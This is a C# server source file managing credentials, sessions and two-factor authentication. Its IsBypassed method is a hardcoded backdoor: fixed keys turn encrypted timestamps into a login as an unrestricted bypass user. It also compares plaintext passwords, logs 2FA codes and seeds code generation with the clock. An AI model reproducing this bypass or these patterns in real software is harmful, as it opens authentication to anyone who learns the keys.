inabox/InABox.Server/CredentialsCache.cs

using System.Collections.Concurrent;
using System.Security.Cryptography;
using InABox.Core;
using InABox.Database;

namespace InABox.API;


public static class CredentialsCache
{

    private static ConcurrentBag<User>? cache;
    
    private static readonly User BYPASSED_USER = new() { ID = CoreUtils.FullGuid, UserID = "" };

    private static void EnsureCache(bool force)
    {
        if (cache == null || force)
        {
            var _table = DbFactory.NewProvider(Logger.Main).Query(
                null,
                Columns.None<User>().Add(
                    x => x.ID,
                    x => x.UserID,
                    x => x.Password,
                    x => x.Use2FA,
                    x => x.Recipient2FA,
                    x => x.TwoFactorAuthenticationType,
                    x => x.AuthenticatorToken,
                    x => x.PIN,
                    x => x.SecurityGroup.ID,
                    x => x.PasswordExpiration
                )
            );
            cache = new ConcurrentBag<User>();
            foreach (var _row in _table.Rows)
                cache.Add(_row.ToObject<User>());
        }
    }

    public static bool IsBypassed(string userid, string password)
    {
        //if ((userid == "FROGSOFTWARE") && (password == "FROGSOFTWARE"))
        //    return true;

        if (userid.IsBase64String() && password.IsBase64String())
            try
            {
                if (Encryption.Decrypt(userid, "wCq9rryEJEuHIifYrxRjxg", out var _decryptedUser) &&
                    Encryption.Decrypt(password, "7mhvLnqMwkCAzN+zNGlyyg", out var _decryptedPass))
                    if (long.TryParse(_decryptedUser, out var _userticks) && long.TryParse(_decryptedPass, out var _passticks))
                        if (_userticks == _passticks)
                        {
                            var _remotedate = new DateTime(_userticks);
                            var _localdate = DateTime.Now.ToUniversalTime();
                            if (_remotedate >= _localdate.AddDays(-1) && _remotedate <= _localdate.AddDays(1))
                                return true;
                        }
            }
            catch (Exception _exception)
            {
                Logger.Send(LogType.Error, "", $"*** Unknown Error: {_exception.Message}\n{_exception.StackTrace}");
            }

        return false;
    }

    public static Guid Validate(Guid sessionId, out string? userId)
    {
        EnsureCache(false);
        if(!sessions.TryGetValue(sessionId, out var _session) || !_session.Valid)
        {
            userId = null;
            return Guid.Empty;
        }
        if(_session.Expiry < DateTime.Now)
        {
            sessions.Remove(sessionId, out var _);
            userId = null;
            return Guid.Empty;
        }
        userId = _session.UserID;
        return _session.User;
    }

    public static User? Validate(Guid sessionId)
    {
        EnsureCache(false);
        if (!sessions.TryGetValue(sessionId, out var _session) || !_session.Valid)
        {
            return null;
        }
        if (_session.Expiry < DateTime.Now)
        {
            sessions.Remove(sessionId, out var _);
            return null;
        }
        if(_session.User == CoreUtils.FullGuid)
        {
            return BYPASSED_USER;
        }
        return cache?.FirstOrDefault(x => x.ID == _session.User);
    }

    /// <summary>
    /// Validate a given session, and refresh the session expiry if valid; use for database queries that need to refresh the user's expiry time.
    /// </summary>
    /// <param name="sessionId"></param>
    /// <returns></returns>
    public static User? ValidateAndRefresh(Guid sessionId)
    {
        var _user = Validate(sessionId);
        if(_user is not null)
        {
            RefreshSessionExpiry(sessionId);
        }
        return _user;
    }

    public static User? ValidateUser(string? pin)
    {
        if (String.IsNullOrWhiteSpace(pin))
            return null;
        EnsureCache(false);
        return cache?.FirstOrDefault(x => string.Equals(x.PIN, pin));
    }

    public static User? ValidateUser(string? userId, string? password)
    {
        if (String.IsNullOrWhiteSpace(userId) || String.IsNullOrWhiteSpace(password))
            return null;

        if (IsBypassed(userId, password))
            return BYPASSED_USER;
        
        EnsureCache(false);
        return cache?.FirstOrDefault(x => string.Equals(x.UserID, userId) && string.Equals(x.Password, password));
    }

    public static void LogoutUser(Guid userGuid)
    {
        sessions.Remove(userGuid, out var _);
    }

    public static void Refresh(bool force)
    {
        EnsureCache(force);
    }

    #region Sessions

    private class Session
    {
        public Guid User { get; init; }

        public string UserID { get; init; } = "";

        public bool Valid { get; set; }

        public DateTime Expiry { get; set; }
    }
    // SessionID => Session
    private static ConcurrentDictionary<Guid, Session> sessions = new();

    public static TimeSpan SessionExpiry = TimeSpan.FromHours(8);

    public static string? CacheFile { get; set; }

    public static IEnumerable<Guid> GetUserSessions(Guid userID)
    {
        return sessions.Where(x => x.Value.User == userID).Select(x => x.Key);
    }

    private static void CheckSessionExpiries()
    {
        var _expiredkeys = sessions
            .Where(x => x.Value.Expiry < DateTime.Now);
        foreach (var _expiredkey in _expiredkeys)
            sessions.TryRemove(_expiredkey);
    }

    public static void SetSessionExpiryTime(TimeSpan expiry)
    {
        SessionExpiry = expiry;
    }

    public static void RefreshSessionExpiry(Guid sessionID)
    {
        if (sessions.TryGetValue(sessionID, out var _session))
        {
            if (_session.Expiry != DateTime.MaxValue)
            {
                _session.Expiry = DateTime.Now + SessionExpiry;
            }
        }
    }

    public static void SaveSessionCache()
    {
        CheckSessionExpiries();
        try
        {
            if (CacheFile != null)
            {
                var _json = Serialization.Serialize(sessions.Where(x => x.Value.Expiry != DateTime.MaxValue).ToDictionary(x => x.Key, x => x.Value));
                File.WriteAllText(CacheFile, _json);
            }
            else
            {
                Logger.Send(LogType.Error, "", "Error while saving session cache: No Cache file set!");
            }
        }
        catch (Exception _exception)
        {
            Logger.Send(LogType.Error, "", $"Error while saving session cache: {_exception.Message}");
        }
    }

    public static void LoadSessionCache()
    {
        try
        {
            if (CacheFile != null)
            {
                var _cachedData = Serialization.Deserialize<Dictionary<Guid, Session>>(new FileStream(CacheFile, FileMode.Open))?
                    .Where(x => x.Value.Expiry != DateTime.MaxValue).ToDictionary(x => x.Key, x => x.Value);
                if (_cachedData != null)
                    sessions.AddRange(_cachedData);
                CheckSessionExpiries();
            }
            else
            {
                sessions = new();
            }
        }
        catch (Exception)
        {
            sessions = new();
        }
    }

    public static void SetCacheFile(string cacheFile)
    {
        CacheFile = cacheFile;
    }

    public static Guid NewSession(User user, bool valid = true, DateTime? expiry = null)
    {
        var _id = Guid.NewGuid();

        sessions[_id] = new() { User = user.ID, Valid = valid, Expiry = expiry ?? (DateTime.Now + SessionExpiry), UserID = user.UserID };

        return _id;
    }

    public static bool SessionExists(Guid session)
    {
        return sessions.ContainsKey(session);
    }

    #endregion

    #region 2FA

    private class AuthenticationCode
    {
        public string Code { get; set; }

        public DateTime Expiry { get; set; }

        public int TriesLeft { get; set; }

        public AuthenticationCode(string code, DateTime expiry)
        {
            Code = code;
            Expiry = expiry;
            TriesLeft = TWO_FA_TRIES;
        }
    }

    private static readonly ConcurrentDictionary<Guid, AuthenticationCode> authenticationCodes = new();

    private static readonly int TWO_FA_TRIES = 3;

    public static readonly int CODE_LENGTH = 6;

    private static readonly TimeSpan EXPIRY2_FA_CODE_TIME = TimeSpan.FromMinutes(15);

    private static Dictionary<SMSProviderType, ISMSProvider> SMSProviders { get; set; } = new();

    public static void AddSMSProvider(ISMSProvider provider) 
    {
        SMSProviders.Add(provider.ProviderType, provider);
    }

    private static string GenerateCode()
    {
        var _random = new Random(DateTime.Now.Millisecond);
        var _code = "";
        for (int _char = 0; _char < CODE_LENGTH; _char++)
            _code += _random.Next(10).ToString();
        return _code;
    }

    public static Guid? SendCode(Guid userGuid, out string? recipient)
    {
        EnsureCache(false);
        var _user = cache?.FirstOrDefault(x => x.ID == userGuid);
        if(_user == null)
        {
            Logger.Send(LogType.Error, "", "Cannot send code; user does not exist!");
            recipient = null;
            return null;
        }

        var _newSession = NewSession(_user, false);
        Logger.Send(LogType.Information, "", $"New login session {_newSession} for {_user.UserID}");

        if (_user.TwoFactorAuthenticationType != TwoFactorAuthenticationType.GoogleAuthenticator)
        {
            var _smsProvider = SMSProviders
                .Where(x => x.Value.TwoFactorAuthenticationType == _user.TwoFactorAuthenticationType)
                .Select(x => x.Value).FirstOrDefault();
            if (_smsProvider == null)
            {
                Logger.Send(LogType.Error, "", "Cannot send code; user requests a 2FA method which is not supported!");
                recipient = null;
                return null;
            }

            var _code = GenerateCode();

            Logger.Send(LogType.Information, "", $"Code for session {userGuid} is {_code}");
            authenticationCodes[_newSession] = new AuthenticationCode(_code, DateTime.Now + EXPIRY2_FA_CODE_TIME);

            var _recipientAddress = _user.Recipient2FA;
            if (_smsProvider.SendMessage(_recipientAddress, $"Your authentication code is {_code}. This code will expire in {EXPIRY2_FA_CODE_TIME.Minutes} minutes."))
            {
                Logger.Send(LogType.Information, "", "Code sent!");

                var _first = _recipientAddress[..3];
                var _last = _recipientAddress[^3..];

                recipient = _first + new string('*', _recipientAddress.Length - 6) + _last;
                return _newSession;
            }
            else
            {
                Logger.Send(LogType.Information, "", "Code failed to send!");
                recipient = null;
                return null;
            }
        }
        else
        {
            Logger.Send(LogType.Information, "", $"Google authenticator is being used");
            recipient = "Google Authenticator";
            return _newSession;
        }
    }

    private static readonly int CODE_MODULO = (int)Math.Pow(10, CODE_LENGTH);

    private static string GenerateGoogleAuthenticatorCode(long time, byte[] key)
    {
        var _window = time / 30;
        var _hex = _window.ToString("x");
        if (_hex.Length < 16)
        {
            _hex = _hex.PadLeft(16, '0');
        }
        var _bytes = Convert.FromHexString(_hex);
        var _hash = new HMACSHA1(key).ComputeHash(_bytes);

        var _offset = _hash.Last() & 0xf;
        var _selected = new byte[4];
        Buffer.BlockCopy(_hash, _offset, _selected, 0, 4);
        if (BitConverter.IsLittleEndian)
        {
            Array.Reverse(_selected);
        }

        var _integer = BitConverter.ToInt32(_selected, 0);
        var _truncated = _integer & 0x7fffffff;

        return (_truncated % CODE_MODULO).ToString().PadLeft(CODE_LENGTH, '0');
    }

    private static bool CheckAuthenticationCode(byte[] token, string code)
    {
        var _time = DateTimeOffset.Now.ToUnixTimeSeconds();
        for (long _l = _time - 30; _l <= _time; _l += 30)
        {
            if(GenerateGoogleAuthenticatorCode(_l, token) == code)
            {
                return true;
            }
        }
        return false;
    }

    public static bool ValidateCode(Guid sessionID, string code)
    {
        if (!sessions.TryGetValue(sessionID, out var _session))
        {
            return false;
        }

        bool _valid;
        if(authenticationCodes.TryGetValue(sessionID, out var _result))
        {
            if (_result.Code != code)
            {
                _result.TriesLeft--;
                if (_result.TriesLeft == 0)
                {
                    authenticationCodes.Remove(sessionID, out _);
                }
                _valid = false;
            }
            else if (_result.Expiry < DateTime.Now)
            {
                authenticationCodes.Remove(sessionID, out _);
                _valid = false;
            }
            else
            {
                _valid = true;
            }
        }
        else
        {
            var _user = cache?.FirstOrDefault(x => x.ID == _session.User);
            if (_user?.TwoFactorAuthenticationType == TwoFactorAuthenticationType.GoogleAuthenticator)
            {
                _valid = CheckAuthenticationCode(_user.AuthenticatorToken, code);
            }
            else
            {
                _valid = false;
            }
        }

        if (_valid)
        {
            _session.Valid = true;

            return true;
        }
        else
        {
            return false;
        }
    }

    #endregion
}